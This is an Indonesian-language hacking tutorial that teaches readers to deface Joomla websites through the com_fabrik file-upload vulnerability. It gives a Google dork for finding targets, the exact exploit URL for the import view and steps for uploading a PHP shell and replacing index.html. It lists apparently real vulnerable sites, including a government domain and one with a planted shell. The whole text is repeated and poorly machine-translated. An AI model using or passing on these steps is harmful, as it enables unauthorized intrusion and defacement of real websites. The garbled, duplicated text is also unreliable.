Com_fabrik Upload Vulnerability
Oleh
chmood
Malam ini, saya akan mengajarkan cara untuk deface website menggunakan Joomla com_fabrik Upload Vulnerability. Metode Serangan pemahaman Com_fabrik komponen Joomla memberikan Anda kekuatan untuk menciptakan bentuk-bentuk dan tabel yang berjalan di dalam Joomla tanpa memerlukan pengetahuan mySQL dan PHP. Kemudian makan data Anda ke dalam Google Maps, Charts atau AJAX berdasarkan calendar.But itu rentan :)
Menemukan Sasaran Rentan Mari kita memulainya
Eksploitasi : /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
1.Paste yang salah dork di www.google.com.
Jika Anda ingin mempersempit pencarian untuk domain .com atau domain .com.au kemudian hanya menambahkan "site: com.au" di atas google dork.
Contoh: inurl:
index.php option = com_fabrik situs:? Com.au
(ini akan serach untuk kerentanan com_fabrik untuk website .com.au) Pemanfaatan Sasaran 1. Setelah Anda memiliki daftar situs, pilih situs web apapun dan mengganti menempatkan mengeksploitasi di belakang situs. Contoh:
Dari http://www.scb.travel/index.php?option=com_fabrik&view=table&tableid=9&calculations=0&Itemid=85 Untuk
http://www.scb.travel/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
2. Kemudian, Anda akan mendapatkan sesuatu seperti ini.
3. Sekarang upload file untuk meng-upload seperti picture.jpg atau shell.php
Setelah file Anda berhasil upload , Anda perlu menambahkan /media/yourfilename.jpg untuk melihat file Anda . contoh :
http://www.scb.travel/media/blackcyberseccrew.jpg
4. Contoh dari situs rentan ,
http://prdbihar.gov.in/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1 http://bluejaylodgecostarica.com/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0 5. Anda juga dapat meng-upload shell Anda ke situs :)
http://bluejaylodgecostarica.com/media/up.php dan deface index.html contoh : ini
Menemukan Sasaran Rentan Mari kita memulainya
Dork:
inurl:? Index.php option = com_fabrik
atau index.php option = com_fabrik?
Eksploitasi : /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
1.Paste yang salah dork di www.google.com.
Jika Anda ingin mempersempit pencarian untuk domain .com atau domain .com.au kemudian hanya menambahkan "site: com.au" di atas google dork.
Contoh: inurl:
index.php option = com_fabrik situs:? Com.au
(ini akan serach untuk kerentanan com_fabrik untuk website .com.au) Pemanfaatan Sasaran 1. Setelah Anda memiliki daftar situs, pilih situs web apapun dan mengganti menempatkan mengeksploitasi di belakang situs. Contoh:
Dari http://www.scb.travel/index.php?option=com_fabrik&view=table&tableid=9&calculations=0&Itemid=85 Untuk
http://www.scb.travel/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
2. Kemudian, Anda akan mendapatkan sesuatu seperti ini.
3. Sekarang upload file untuk meng-upload seperti picture.jpg atau shell.php
Setelah file Anda berhasil upload , Anda perlu menambahkan /media/yourfilename.jpg untuk melihat file Anda . contoh :
http://www.scb.travel/media/blackcyberseccrew.jpg
4. Contoh dari situs rentan ,
http://prdbihar.gov.in/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1 http://bluejaylodgecostarica.com/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0 5. Anda juga dapat meng-upload shell Anda ke situs :)
http://bluejaylodgecostarica.com/media/up.php dan deface index.html contoh : ini
Category